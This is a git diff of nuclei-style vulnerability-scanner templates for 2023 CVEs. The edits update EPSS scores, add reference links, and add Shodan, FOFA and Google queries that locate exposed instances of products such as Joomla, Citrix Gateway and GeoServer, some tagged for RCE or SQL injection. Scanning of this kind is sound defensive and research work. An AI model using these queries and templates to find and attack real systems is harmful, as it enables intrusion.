490a0046304402202404926dcf3a6a42dccec5b59e3d4dc2a13748530e430330c1563e0d676d440002207238a9a44101263d3b8d936b7e391dd9274756d519f77c7f49df13faab120930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce855e670e183a3c0c3f09471253246615d2b5faf6c6e9d1156669c259f16abe02202d77885086d1d097ed3172a6980ca5784d9c874d2bd06d38c32e8128a197e0a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index eda7da80c5..3e1d00cb18 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-23491 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45193 + epss-score: 0.0012 + epss-percentile: 0.46205 cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: fullworksplugins product: quick_event_manager framework: wordpress + shodan-query: http.html:/wp-content/plugins/quick-event-manager + fofa-query: body=/wp-content/plugins/quick-event-manager publicwww-query: "/wp-content/plugins/quick-event-manager" tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins @@ -42,4 +44,4 @@ http: - 'contains(body, "")' - 'contains(body, "qem_calendar")' condition: and -# digest: 480a00453043021f3e95e9556a9b9ec5ade59d7f4572f3867d7c2c8a1d7b95ae257a372f41c7ea02203ca63137dbaab35e0a9cd15cdc7b6002cf777667358a298c96fe3f5703172f5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a228a7862f653f746c8a54358638b762b4f431d226ad393cfcee63002d646ad002210089dfd526bc3fb3e3a4b6d2d7fe00fc7f64cf427ff96502715c2df1956d4d494b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 37f3c3f73a..1b3226dc7e 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -14,13 +14,15 @@ info: - https://wordpress.org/plugins/login-with-phone-number/ - https://www.tenable.com/security/research/tra-2023-3 - https://nvd.nist.gov/vuln/detail/CVE-2023-23492 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-23492 cwe-id: CWE-89 - epss-score: 0.05192 - epss-percentile: 0.92229 + epss-score: 0.06178 + epss-percentile: 0.93551 cpe: cpe:2.3:a:idehweb:login_with_phone_number:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b3170213b0f1a447866043356305b581a32458c87e9ec2841fba4480f233cf07022100ac9d1b4b13994df1e15d76984cc662270f9540f5910faed4c46ee75e5297fb81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011d1689f5448355a69a24aed9e5d0f916586008da1dbac8cd0605f9726d70b28022100aa03325f5120eb1358d6c1ea5e0b67037507a78ead26f9934782a7b27d56214d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 04fa783e7a..65da6cedf3 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 - epss-score: 0.00875 - epss-percentile: 0.82072 + epss-score: 0.01406 + epss-percentile: 0.86426 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +30,11 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: app="MLflow" + fofa-query: + - app="MLflow" + - app="mlflow" + - title="mlflow" + google-query: intitle:"mlflow" tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects variables: str: "{{rand_base(6)}}" @@ -71,4 +75,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4a0a0047304502201dc691af618aeb7ae1784f119f04c2ae83a05a8b759601debe738dd5c11308e1022100a5df5635703f52bc26e0ed9760ccc09d6f92a23a35e8c13c9b272a203d54b34a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f0a21f7d206dec98e8f87565781a99fedda197d776617f6d266fe245242061f022100ff34925e4f91bb9951803355f009dfc63d5d727adc5652223c2a61d58e324df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 6d0fee1022..49651092c8 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -19,15 +19,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 - epss-score: 0.96314 - epss-percentile: 0.9944 + epss-score: 0.93208 + epss-percentile: 0.99053 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: joomla product: joomla\! - shodan-query: html:"Joomla! - Open Source Content Management" + shodan-query: + - html:"Joomla! - Open Source Content Management" + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" + fofa-query: body="joomla! - open source content management" tags: cve,cve2023,joomla,kev http: @@ -57,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f1a8859b2be34845c6e9ff983c9ab9fc1741ee2e59af7319158de1e37c2002850221009b6444bdf0c4f9f9c9da30901088c17b893d690461a859cb5a97e2488a963ce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df5014285170b4931b6df8e224338d5011d418d459a25aeb3739ab76a2a0fad202210096c6acc2b6b03656446755259bc48f78318ce3d39b62b3f77e81be135fe156a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 5661dadb7d..b06bf94b42 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -21,16 +21,23 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24044 cwe-id: CWE-601 - epss-score: 0.00155 - epss-percentile: 0.51774 + epss-score: 0.00174 + epss-percentile: 0.54488 cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: plesk product: obsidian - shodan-query: title:"Plesk Obsidian" - fofa-query: title="Plesk Obsidian" + shodan-query: + - title:"Plesk Obsidian" + - http.html:"plesk obsidian" + - http.title:"plesk obsidian" + fofa-query: + - title="Plesk Obsidian" + - body="plesk obsidian" + - title="plesk obsidian" + google-query: intitle:"plesk obsidian" tags: cve2023,cve,header,injection,plesk,obsidian http: @@ -51,4 +58,4 @@ http: - type: status status: - 303 -# digest: 4a0a00473045022069dc022651b4fb9af6a01bd55d548680f03edd9debffa187316d1b018f1209cc022100c92c5328721c039369314c3c7035951e413c56f1862f781e9d73bac65cfa6719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4012229519fa2761db92e39507fe2caf668a18dac3214d7ee7a2bddb162a488022026a141f13c66eb66e2170134f958feb2a3c58097808460c971629b4a9b26bf46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 0634d19106..51fc96b2d1 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -21,15 +21,17 @@ info: cvss-score: 7.5 cve-id: CVE-2023-24243 cwe-id: CWE-918 - epss-score: 0.00541 - epss-percentile: 0.7489 + epss-score: 0.01019 + epss-percentile: 0.83727 cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cdata product: arc - shodan-query: http.favicon.hash:163538942 + shodan-query: + - http.favicon.hash:163538942 + - http.favicon.hash:"163538942" fofa-query: icon_hash="163538942" tags: cve,cve2023,cdata,rsb,ssrf @@ -48,4 +50,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022054c3c87e069b7846742f839a48c18be5bc69b97802d64b2331e054b536034d060221008e48d0ad117709530cac2b848e0f5c767120497bc71b446ac4435ee05a22b65b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b9ce44d92b9596d0ec6940ddf8e5e6fdc35b41d1df3039174a543212b8c8b4a5022100cefe0df1b2f3066f864f771121da6548ed9d59e695fe77e88ab58c7a191fe814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index b046979578..c0faa3b565 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24278 cwe-id: CWE-79 - epss-score: 0.0011 - epss-percentile: 0.4314 + epss-score: 0.00158 + epss-percentile: 0.52245 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: squidex.io product: squidex shodan-query: http.favicon.hash:1099097618 + fofa-query: icon_hash=1099097618 tags: cve2023,cve,xss,squidex,cms,unauth,squidex.io http: @@ -53,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100864e11cd58027c669cee192c677ee283ed0733f2678005853b921cfb44f28b3102200322c72442e008b6ef888ff07403a0ec4d6adf83bcfc2588e2787801ef103cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022075936e59a6abe44eca6d08a907e1997d26c08a741ab9e8b33b1dd72ce0770618022100930a07f08705b2c3bc8f969b1342f7b7d1a6dc010a918a4dc424f8eb0861a7aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 59b943a776..ad9acdee2a 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -13,20 +13,24 @@ info: - https://github.com/i7MEDIA/mojoportal/ - https://www.mojoportal.com/ - https://nvd.nist.gov/vuln/detail/CVE-2023-24322 + - https://github.com/blakduk/Advisories classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-24322 cwe-id: CWE-79 - epss-score: 0.0009 - epss-percentile: 0.37778 + epss-score: 0.00157 + epss-percentile: 0.52131 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: mojoportal product: mojoportal - shodan-query: html:"mojoPortal" + shodan-query: + - html:"mojoPortal" + - http.html:"mojoportal" + fofa-query: body="mojoportal" tags: cve,cve2023,cves,mojoportal,xss http: @@ -51,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d4b793962f02a94d8db15533461bce0f9799f188a498b05b38d0da714a23c4ad0220610e78c9f9d83ddf1b56ac0ec677dc3aeec74ce80aee1e69b72de56930a880fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049c88fd3f275ed9e2255b809b6b960267edb7c2a0633e0355e12cebb3ea6d6c4022100ac1280a9d8184f5b74719713e2656abd8b1fc85aeb06a5bd0ca39d113d2f0134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index cc500b1fe8..587afe6245 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -21,14 +21,18 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24488 cwe-id: CWE-79 - epss-score: 0.0101 - epss-percentile: 0.8202 + epss-score: 0.05227 + epss-percentile: 0.93007 cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: citrix product: gateway - shodan-query: title:"Citrix Gateway" + shodan-query: + - title:"Citrix Gateway" + - http.title:"citrix gateway" + fofa-query: title="citrix gateway" + google-query: intitle:"citrix gateway" tags: cve2023,cve,citrix,xss,adc http: @@ -56,4 +60,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100b9fde4e5a98c376353cf072f935c8a0b049c84919585134c7a52d0eb9623953f022000d7a1f8d0dad24a1042be1bc800c8bf3322dcd62b54fea3327e0face361a222:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220519ea0a910a71d0468f28b45ba408d92479c6d9475f80f5ee3d78a14ef061fe6022100c829b535a3c80899d9e626fc41a95764714592bd8dc12ac540792c8a8c3f89d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 904c250e19..1b681bb5ec 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -21,15 +21,19 @@ info: cvss-score: 9.8 cve-id: CVE-2023-24489 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.97362 - epss-percentile: 0.99893 + epss-score: 0.9742 + epss-percentile: 0.99933 cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: verified: true max-request: 256 vendor: citrix product: sharefile_storage_zones_controller - shodan-query: title:"ShareFile Storage Server" + shodan-query: + - title:"ShareFile Storage Server" + - http.title:"sharefile storage server" + fofa-query: title="sharefile storage server" + google-query: intitle:"sharefile storage server" tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix variables: fileName: '{{rand_base(8)}}' @@ -62,4 +66,4 @@ http: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' -# digest: 4b0a00483046022100e02ace90a1a3782dc846f7db6c3799e3e6f2dbd7db12315587f79f87591c3e76022100d83634800b925f23dbb1f24ae13c6577e8531c7008b64b40c03a95995e205afa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a2c5ec01132611d909015166f5c83f43e8236a17f3b971ba3d6c194d92e4113022100e81878e9368d2eaa8aab6b3d045aeeea524badbf045c96811a05254f0279a619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index a29dc98497..ad625a1726 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -18,15 +18,18 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24657 cwe-id: CWE-79 - epss-score: 0.03111 - epss-percentile: 0.90058 + epss-score: 0.01878 + epss-percentile: 0.88418 cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: phpipam product: phpipam - shodan-query: html:"phpIPAM IP address management" + shodan-query: + - html:"phpIPAM IP address management" + - http.html:"phpipam ip address management" + fofa-query: body="phpipam ip address management" tags: cve2023,cve,xss,phpipam,authenticated http: @@ -47,4 +50,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "Subnet masks")' condition: and -# digest: 490a0046304402207f21098ce5bf40eb4a6275ff15bb690cbde2da1648dff89f6ac3fb578d943bec022054add055809df92504ac4ebeff525e4c4182ece10d818fb597ffa9f48b7bf6b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a3c01aa2ee205f3fe61422324c53106c84b5751e93918bae15c9ba468b0e4a502202271388d4cb8abc60a17e9fc602aaf32c1be6f8f4ef9f40fc23a171b2121345c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index f6b110e77e..75538d06f9 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -19,16 +19,21 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24733 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39455 + epss-score: 0.00099 + epss-percentile: 0.41025 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: sigb product: pmb - shodan-query: http.favicon.hash:1469328760 - tags: cve,cve2023,unauth,xss,pmb,pmb_project + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve,cve2023,unauth,xss,pmb,pmb_project,sigb http: - method: GET @@ -50,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d08cf09e7dc5425596c3cca412921a6990b702806ce847b868b3179a77b3dfca022051df8f622f5f78b42f4466f8f3cf2e9fbc6b5eccf03b1270d759323219651ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbbf8f01342a3da1aa77a3ac5e20924036502f44daa7678bea6f5d022b3588dc022100dd8315989ca3510f6ac2406e899f14bcd65aff99d82da3f8a31fd4b3153a9a1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index d04f3ed161..ff8fb3ef46 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -19,16 +19,21 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24735 cwe-id: CWE-601 - epss-score: 0.00947 - epss-percentile: 0.8279 + epss-score: 0.0116 + epss-percentile: 0.84859 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: sigb product: pmb - shodan-query: http.favicon.hash:1469328760 - tags: cve2023,cve,redirect,pmb,pmb_project + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve2023,cve,redirect,pmb,pmb_project,sigb http: - method: GET @@ -40,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100ceae583574e8508ec06b34037f78dc1c5f19ddc0b9d7c67ca4b8d421f11f32b802205b406cd0b8fb8a762e03ccc5cfbe8aedd976adc4e1b121163062d916f54bb57f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100979ae0c14f78631e1ed9d7c56d050949b4748984129972eed4e454037b3cfb880221008f145d728ced77077fa6122a5df7d0fdefc9b8ba6c81647fa9144410569dbb6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 91572fef17..0ddf9cf853 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -19,16 +19,21 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24737 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39455 + epss-score: 0.00099 + epss-percentile: 0.41025 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: sigb product: pmb - shodan-query: http.favicon.hash:1469328760 - tags: cve2023,cve,xss,pmb,pmb_project + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve2023,cve,xss,pmb,pmb_project,sigb http: - raw: @@ -51,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a433ef07e25a34aa6e771afe6bcd7421f7d8f9da2a819104633dfaebb224713022057a7b3b74f01ee1509016fec6b6e58f2647005bff55b022b5ac8592a800fe4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205aca91058a68b052da6ad45486312b6d8aabb6f3784060d9f272c810fa6aa5e1022001e381be655320e8762a3c3680508216045524f3a62dc26bd7b30ccd633c98e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 5cc676336d..9c532f85dc 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -11,13 +11,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ - https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe + - https://github.com/Marco-zcl/POC + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2479 cwe-id: CWE-78 - epss-score: 0.95882 - epss-percentile: 0.99324 + epss-score: 0.96532 + epss-percentile: 0.99605 cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -50,4 +52,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100d44c6fd6e068737f5ac44173614742e26bb00e419da5422b4137ec5d86e4f57d022100f437027151fbfc03ee45e7332fab84cc9f46e0b134ce5ac0d3948dd9d6147a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1a352672a989af8e3c79dfa0ed6be743b40148495bfe0de7495e721c3d3cf30022100dbadd06ff944bb8596396571fff0382198c298180fd68270d546b2d3f2500ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index b5e1f0a9b1..de102a7587 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -21,15 +21,26 @@ info: cve-id: CVE-2023-25135 cwe-id: CWE-502 epss-score: 0.71557 - epss-percentile: 0.97978 + epss-percentile: 0.98058 cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vbulletin product: vbulletin - shodan-query: http.component:"vBulletin" - google-query: intext:"Powered By vBulletin" + shodan-query: + - http.component:"vBulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - http.title:"powered by vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"Powered By vBulletin" + - intitle:"powered by vbulletin" + - intext:"powered by vbulletin" tags: cve,cve2023,vbulletin,rce http: @@ -58,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce2bf923005a767a1b859b3e4f2a4fce8709e03f3e8ca3913a9b86099ccf4d6d02203544ccb00bbe8541385556ded06192cb9d058e991038779cf79a4934da6495bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd39ae8922327a2c38f6ffb4613c1e32fe3cc3f0b37035f194bbe9ef160c183002203173b9e5f324ec0f8b27db0745fc53e338cf8beea96a8daf9db138182ca8512a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index fbf7804509..eb244b08b5 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -21,15 +21,21 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25157 cwe-id: CWE-89 - epss-score: 0.41862 - epss-percentile: 0.96974 + epss-score: 0.59299 + epss-percentile: 0.97754 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 3 vendor: osgeo product: geoserver - shodan-query: title:"geoserver" + shodan-query: + - title:"geoserver" + - http.title:"geoserver" + fofa-query: + - title="geoserver" + - app="geoserver" + google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo http: @@ -76,4 +82,4 @@ http: - 'FID,([aA-zZ_]+),' internal: true part: body_2 -# digest: 4b0a00483046022100a3222cc7b1d0a9ddb3db8e1edf4d46d53dc3d1e5c5183e91d231d4b6d2965c23022100866dde35ab00b7554d055458ac9c8e99054504e1b114976d1d16b238249aa447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8d03081deaad597168e42a96ade9cb3d2171483bb602fe10d5e49818378dbda022058809cf715929d605db6001b9328bb309fd710934580675e57040b7819097c4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index c250daba2a..089bfe5f23 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -17,15 +17,18 @@ info: cvss-score: 8.8 cve-id: CVE-2023-25194 cwe-id: CWE-502 - epss-score: 0.89626 - epss-percentile: 0.98692 + epss-score: 0.96717 + epss-percentile: 0.99653 cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: kafka_connect - shodan-query: html:"Apache Druid" + shodan-query: + - html:"Apache Druid" + - http.html:"apache druid" + fofa-query: body="apache druid" tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast http: @@ -96,4 +99,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022040f38271d9eeed074bae69e573d343878cb2471b0becb2a8ec869d630b119ba502200daf17c6f547a912abddcda4a7bf5ad2c352605043e19ce00a29179038bc3555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index 4f7a6a5362..8a8b7d8f29 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -14,13 +14,15 @@ info: - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346 - https://nvd.nist.gov/vuln/detail/CVE-2023-25346 - https://github.com/ChurchCRM/CRM + - https://github.com/10splayaSec/CVE-Disclosures + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-25346 cwe-id: CWE-79 - epss-score: 0.00089 - epss-percentile: 0.37238 + epss-score: 0.00165 + epss-percentile: 0.5311 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true @@ -49,4 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 490a0046304402207b82c78496d0686df4a8b54ee3e7430a2aae6a4d50f75c48c28383063a9c1851022055cbcd42db1a3790b0acdd4afd092d56e421d551edd10257dab81b1e6c7cbe78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220266625a03a385660482d100a25922e690653fdba45bf1e1a41a827fd8af8caa6022100ca808f4d98cd7c2a45723e7770bcb998dbaf4affca5206da3a7bd75d4ff13283:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 20143feedc..6a7ca10e25 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -20,15 +20,19 @@ info: cvss-score: 7.5 cve-id: CVE-2023-25573 cwe-id: CWE-862 - epss-score: 0.03674 - epss-percentile: 0.91517 + epss-score: 0.04496 + epss-percentile: 0.92455 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: metersphere product: metersphere - fofa-query: body="Metersphere" + shodan-query: http.html:"metersphere" + fofa-query: + - body="Metersphere" + - body="metersphere" + - title="metersphere" tags: cve,cve2023,metersphere,lfi variables: str: "{{rand_base(4)}}" @@ -59,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab816efcbc5a7db8eacab493caab83f3dba6c09efceae69db79af63d2d711e3c02204b221648b2e6153a538e9fd48e38ff9a6a67590aa66a6b7a9e031080ffa9edc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 